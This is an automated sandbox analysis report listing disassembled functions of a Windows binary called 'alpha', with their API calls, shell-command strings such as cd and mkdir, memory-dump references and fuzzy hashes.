                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: cf0a8f3ac87f99a910125d8a782244f90201a2d44ca752fd016b510be9c156f2
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 93dfa3f02bf5ba28550a87f4995c702b80903100e6d5cdb1b277a4f468bc6605
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CF4124707046CD8BCB34AB2B994577A72C69B9070CF14386AE915B73D5FB60EC48C293
                                                                                                                                                                                                                                                                                                                                                      Function 00EF6E30 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 00EF6E37
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF742D: malloc.MSVCRT ref: 00EF7444
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: H_prolog3_catchmalloc
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 125873668-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: e0ade00145c95c42de3bdcd8568539bf119a8020e5acdf8daf48a5518db36494
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 4383485358a1cfca050974e446e04a41658c85190faed5b21c466170b19fec73
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e0ade00145c95c42de3bdcd8568539bf119a8020e5acdf8daf48a5518db36494
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BFC08C6622810CD6FB403790E00377C2A90AB40B02F90B014B38439091DE704A14AA61
                                                                                                                                                                                                                                                                                                                                                      Function 00EF1A05 Relevance: 1.3, APIs: 1, Instructions: 34COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2221118986-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 5f8fb2f5729966e5f29c7f5674799093a3c99919dc517806ce8ae02962223857
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 6ca8329840f8e35e179ddaef815aad803041a137e900bfaa1f6f88aa1cf335cb
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f8fb2f5729966e5f29c7f5674799093a3c99919dc517806ce8ae02962223857
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6BE0267770A6292BE22C18A96C87F378B9DCBC0B70F29103AF704AA180E9A14D0002A4

                                                                                                                                                                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                                                                                                                                                                      Function 00F04191 Relevance: 65.1, APIs: 30, Strings: 7, Instructions: 353memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,00000000,00000001), ref: 00F041B9
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00F041CA
                                                                                                                                                                                                                                                                                                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?), ref: 00F04205
                                                                                                                                                                                                                                                                                                                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00F28E04), ref: 00F0426C
                                                                                                                                                                                                                                                                                                                                                      • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00F09E02,?,00000010), ref: 00F04283
                                                                                                                                                                                                                                                                                                                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00F28E04), ref: 00F04292
                                                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00F042B1
                                                                                                                                                                                                                                                                                                                                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00F042C4
                                                                                                                                                                                                                                                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 00F042D2
                                                                                                                                                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL ref: 00F042D9
                                                                                                                                                                                                                                                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 00F0432F
                                                                                                                                                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL ref: 00F04336
                                                                                                                                                                                                                                                                                                                                                      • _wcsnicmp.MSVCRT ref: 00F043DB
                                                                                                                                                                                                                                                                                                                                                      • _wcsnicmp.MSVCRT ref: 00F043F0
                                                                                                                                                                                                                                                                                                                                                      • _wcsnicmp.MSVCRT ref: 00F04405
                                                                                                                                                                                                                                                                                                                                                      • _wcsnicmp.MSVCRT ref: 00F0441A
                                                                                                                                                                                                                                                                                                                                                      • _wcsnicmp.MSVCRT ref: 00F0442F
                                                                                                                                                                                                                                                                                                                                                      • _wcsnicmp.MSVCRT ref: 00F04444
                                                                                                                                                                                                                                                                                                                                                      • _wcsnicmp.MSVCRT ref: 00F04459
                                                                                                                                                                                                                                                                                                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,00000001,?), ref: 00F044A5
                                                                                                                                                                                                                                                                                                                                                      • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?), ref: 00F044F0
                                                                                                                                                                                                                                                                                                                                                      • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,00000020,?,?,?), ref: 00F04506
                                                                                                                                                                                                                                                                                                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000), ref: 00F0451D
                                                                                                                                                                                                                                                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 00F04565
                                                                                                                                                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL ref: 00F0456C
                                                                                                                                                                                                                                                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,00000001), ref: 00F04595
                                                                                                                                                                                                                                                                                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00F0459C
                                                                                                                                                                                                                                                                                                                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00F28E04), ref: 00F045C3
                                                                                                                                                                                                                                                                                                                                                      • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00F09E02,?,00000000), ref: 00F045D4
                                                                                                                                                                                                                                                                                                                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00F28E04), ref: 00F045DD
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferCriticalInfoReadReleaseScreenSection$AllocCharacterCursorEnterFillHandleLeaveOutputPositionWrite_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                      • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2991647268-3100821235
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 31e2e29144f596d08be85bf3d37c572b54aa16fdfe1ba6389a7f4604c9e0229e
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 269f741bc33cde08a633c6de605ef8a7ded491522eac62629681e2755247657d
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 31e2e29144f596d08be85bf3d37c572b54aa16fdfe1ba6389a7f4604c9e0229e
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AAC1BEB0A04305ABC720DF64DC49A2ABBE5FF88724F04892CFA56D22E0D775D945FB52
                                                                                                                                                                                                                                                                                                                                                      Function 00EE4C10 Relevance: 33.8, APIs: 14, Strings: 5, Instructions: 552COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                                                                                      • String ID: [...]$ [..]$ [.]$...$:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 0-1980097535
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 6c79197ad85b7c19bdb134875e64830c14191bc3ac922a0dea0b4e0833bede99
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: bd6b5f7e9f98c36937201c016f371fddb58450c83f6c0613946f89d546118785
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6c79197ad85b7c19bdb134875e64830c14191bc3ac922a0dea0b4e0833bede99
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8612C1B03083499BD724DB25C985ABFB7E9EF88344F00592DF689E7291EB34D845CB52
                                                                                                                                                                                                                                                                                                                                                      Function 00EE6854 Relevance: 30.1, APIs: 14, Strings: 3, Instructions: 366timeCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00F0E590,?,00002000), ref: 00EE6896
                                                                                                                                                                                                                                                                                                                                                      • SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00EE68AA
                                                                                                                                                                                                                                                                                                                                                      • FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 00EE68BE
                                                                                                                                                                                                                                                                                                                                                      • FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00EE68D2
                                                                                                                                                                                                                                                                                                                                                      • realloc.MSVCRT ref: 00EFA5E7
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE8791: GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00EE6906,0000001F,?,00000080), ref: 00EE8791
                                                                                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001F,?,00000080), ref: 00EE6907
                                                                                                                                                                                                                                                                                                                                                      • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?), ref: 00EE698F
                                                                                                                                                                                                                                                                                                                                                      • memmove.MSVCRT(?,?,?), ref: 00EE6A86
                                                                                                                                                                                                                                                                                                                                                      • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?,00000000,00000000), ref: 00EE6AAF
                                                                                                                                                                                                                                                                                                                                                      • realloc.MSVCRT ref: 00EE6ACA
                                                                                                                                                                                                                                                                                                                                                      • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?,00000000,00000001), ref: 00EE6AFE
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Time$File$DateFormatSystem$realloc$DefaultInfoLocalLocaleUsermemmove
                                                                                                                                                                                                                                                                                                                                                      • String ID: %02d%s%02d%s%02d$%s $%s %s
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2927284792-4023967598
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 590d1601992e950f5be8f390aa6433afc81c41e588e4934d8801f46f0d458264
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 2534a1b326f687a7d9d0379ddc9c5389288e38ab85487e43a2d848c976f36766
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 590d1601992e950f5be8f390aa6433afc81c41e588e4934d8801f46f0d458264
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DFC1D6B190025D9BCB24DF619C45AFA73B8EF84304F1490B9E90DFB251EA319E85DB61
                                                                                                                                                                                                                                                                                                                                                      Function 00EF4EC1 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 395fileCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00EF4F03
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
                                                                                                                                                                                                                                                                                                                                                      • FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,-00000001), ref: 00EF4F67
                                                                                                                                                                                                                                                                                                                                                      • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000001), ref: 00EF4F77
                                                                                                                                                                                                                                                                                                                                                      • FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00EE2670,?,?,?,-00000001), ref: 00EF4FEB
                                                                                                                                                                                                                                                                                                                                                      • FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,-00000001), ref: 00EF5103
                                                                                                                                                                                                                                                                                                                                                      • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,-00000001), ref: 00EF511E
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,-00000001), ref: 00EF5141
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Find$File$CloseFirstmemset$Next
                                                                                                                                                                                                                                                                                                                                                      • String ID: \\?\
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3059144641-4282027825
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 6172d391563b4320ed70e90d6ae868dd598e9ff89063582c101341bb84323b13
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: e0dc57735dde5002b3a90e4e0403b737df3536833660681b50bba50229cd359b
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6172d391563b4320ed70e90d6ae868dd598e9ff89063582c101341bb84323b13
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DCE1D472A0050D9BDB24DB64CC85BFA73B9EF64314F4414A9EB09F7181EB31AE85EB50
                                                                                                                                                                                                                                                                                                                                                      Function 00EE532E Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 272COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000002), ref: 00EE539C
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                                                      • String ID: )W$)W
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3188754299-341896779
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 3a72f03d0cb6879d893edea50ef486c4cba4b4037ebbbfb1845dd4082ec31f61
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 88517295caf5ffad0be8314ec77045124bfc8b855fe9544dc13d3c84fdc903a3
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3a72f03d0cb6879d893edea50ef486c4cba4b4037ebbbfb1845dd4082ec31f61
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FCA1E37290010A8BCB24DF64C8857FEB3B5EF54318F5454ADDA9AF7241EB319E86CB60
                                                                                                                                                                                                                                                                                                                                                      Function 00F0769E Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 464COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(55099697,00000000,?), ref: 00F07710
                                                                                                                                                                                                                                                                                                                                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00F07722
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEEC2E: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00F0E590,00002000,?,00F28BF0,00000000,?,?,00EE8F0D), ref: 00EEEC51
                                                                                                                                                                                                                                                                                                                                                      • towupper.MSVCRT ref: 00F078BC
                                                                                                                                                                                                                                                                                                                                                      • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00F079F1
                                                                                                                                                                                                                                                                                                                                                      • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,00EE1F8C,00EE3B98), ref: 00F07B15
                                                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,55099697,00000000,?), ref: 00F07D0D
                                                                                                                                                                                                                                                                                                                                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00F07D20
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeave$DriveEnvironmentFreeLocalTypeVariabletowupper
                                                                                                                                                                                                                                                                                                                                                      • String ID: %s $%s>$PROMPT$Unknown
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 708651206-3050974680
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: cd694f87a81159579f5ef6d57083d06c05a89a915222174efe52d8644b3caa6a
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 1a3bb354eb9009ea7fb259ea49e1457c2710ffe10b0b816227dbd6cfdcaa3a5d
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cd694f87a81159579f5ef6d57083d06c05a89a915222174efe52d8644b3caa6a
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5A02D575E052198BCB24EF29CC496AAB7B5FF84310F14C1D9E409E7294EB306E82FB54
                                                                                                                                                                                                                                                                                                                                                      Function 00F0C1FA Relevance: 19.7, APIs: 13, Instructions: 179filememorynativeCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00F0C135: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,?), ref: 00F0C14E
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00F0C135: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000008,?,00000000,00000000,?), ref: 00F0C16A
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00F0C135: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,?,?,00000000,00000000,?), ref: 00F0C17B
                                                                                                                                                                                                                                                                                                                                                      • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(40002749,00000001), ref: 00F0C24F
                                                                                                                                                                                                                                                                                                                                                      • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000001), ref: 00F0C270
                                                                                                                                                                                                                                                                                                                                                      • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,40000000,00000001,00000000,00000003,02000000,00000000), ref: 00F0C293
                                                                                                                                                                                                                                                                                                                                                      • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 00F0C2AE
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00F0C2EF
                                                                                                                                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?), ref: 00F0C324
                                                                                                                                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,?), ref: 00F0C370
                                                                                                                                                                                                                                                                                                                                                      • NtFsControlFile.NTDLL ref: 00F0C392
                                                                                                                                                                                                                                                                                                                                                      • RtlNtStatusToDosError.NTDLL ref: 00F0C39D
                                                                                                                                                                                                                                                                                                                                                      • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00F0C3A4
                                                                                                                                                                                                                                                                                                                                                      • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00F0C3B6
                                                                                                                                                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL ref: 00F0C3D1
                                                                                                                                                                                                                                                                                                                                                      • RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00F0C3E2
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00F0C5F2: memset.MSVCRT ref: 00F0C62E
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00F0C5F2: memset.MSVCRT ref: 00F0C656
